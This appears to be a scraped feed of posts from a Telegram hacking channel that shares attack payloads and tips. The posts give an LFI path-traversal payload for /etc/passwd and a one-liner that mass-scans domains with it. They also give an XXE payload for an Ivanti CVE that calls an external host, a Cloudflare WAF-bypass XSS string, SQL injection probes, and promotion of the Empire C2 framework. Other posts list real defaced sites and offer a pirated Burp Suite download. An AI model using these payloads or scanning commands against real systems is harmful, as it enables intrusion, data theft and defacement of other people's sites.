0Day.Today | Learn Exploit | Zero World | Dark web

0Day.Today | Learn Exploit | Zero World | Dark web |

LFI Payload⚡️

Payload:

".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army

⚡10❤3❤‍🔥1🔥1

4.66K views14:21

0Day.Today | Learn Exploit | Zero World | Dark web |

LFI Payload⚡️ Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #LFI #Payload —————— 0Day.Today @LearnExploit @Tech_Army

Sick Finding 🥵⚡️

cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt

#tip
——————
0Day.Today
@LearnExploit
@Tech_Army

🔥10👍2

4.26K views07:26

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

&lt;?xml version="1.0" ?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % xxe SYSTEM "http://{{external-host}}/x"&gt; %xxe;]&gt;&lt;r&gt;&lt;/r&gt;

⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army

🔥7👍4

4.79K views07:33

0Day.Today | Learn Exploit | Zero World | Dark web |

🕸 Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

👁‍🗨

Mirror-h

Country: 🇺🇸

🇹🇭

#Deface

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡3👍3❤1🔥1

4.32K views13:35

0Day.Today | Learn Exploit | Zero World | Dark web |

👑 Empire 👑

💬

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:

cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh

😸

Github

#Hacktoberfest #C2 #Redteam #Infrastructure

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

👍8⚡1❤1

5K views14:25

0Day.Today | Learn Exploit | Zero World | Dark web |

cloudflare WAF bypass XSS

any payload they blocked by cloudflare

this payload working

"><img src=x onerrora=confirm() onerror=confirm(1)>

#Cloudflare #Bugbounty #Tip

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

❤5⚡3🔥2👍1👏1

5.51K views11:43

0Day.Today | Learn Exploit | Zero World | Dark web |

burpsuite_pro_v2024.zip

692.2 MB

Burp Suite Version 2024 🔻

❌ نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت .✔️

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army

Please open Telegram to view this post

VIEW IN TELEGRAM

❤‍🔥7❤1

4.22K viewsedited 12:38

0Day.Today | Learn Exploit | Zero World | Dark web |

Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "><img src=x onerror=alert(1)> [Blocked By Cloudflare]

⛔

Payload Used : "><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡4🔥4❤2👍1👎1

3.86K views12:46

0Day.Today | Learn Exploit | Zero World | Dark web |

7 SQLs

4 in php

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1 in aspx

orwa';%20waitfor%20delay%20'0:0:6'%20--%20

2 in graphql

orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--

#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army

🔥9❤‍🔥3👍2

4.81K views07:34

0Day.Today | Learn Exploit | Zero World | Dark web |

PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

⚡8❤‍🔥3🔥3👍1

5.06K views09:43

0Day.Today | Learn Exploit | Zero World | Dark web |

Google Dorks to Find Sensitive data or dir

#google #cybersec #infosec

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

❤8⚡3❤‍🔥1🔥1

4.2K views17:30

0Day.Today | Learn Exploit | Zero World | Dark web |

Forwarded from ..:: X P 4 ::..

5:11

توضیحاتی درباره فیلتر روبیکا🔥
مراقب کلاهبرداران باشید بعضیا میان دوباره میگن رفع فیلتری وجود داره هعب

3.63K views18:56

0Day.Today | Learn Exploit | Zero World | Dark web |

Google Bug Bounty Dorks Generator

🌎

Site

#BugBounty #Tips

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥7⚡2❤1💯1

3.65K views00:03

0Day.Today | Learn Exploit | Zero World | Dark web |

Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE

Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0

#BugBounty #Tips #SQL

➖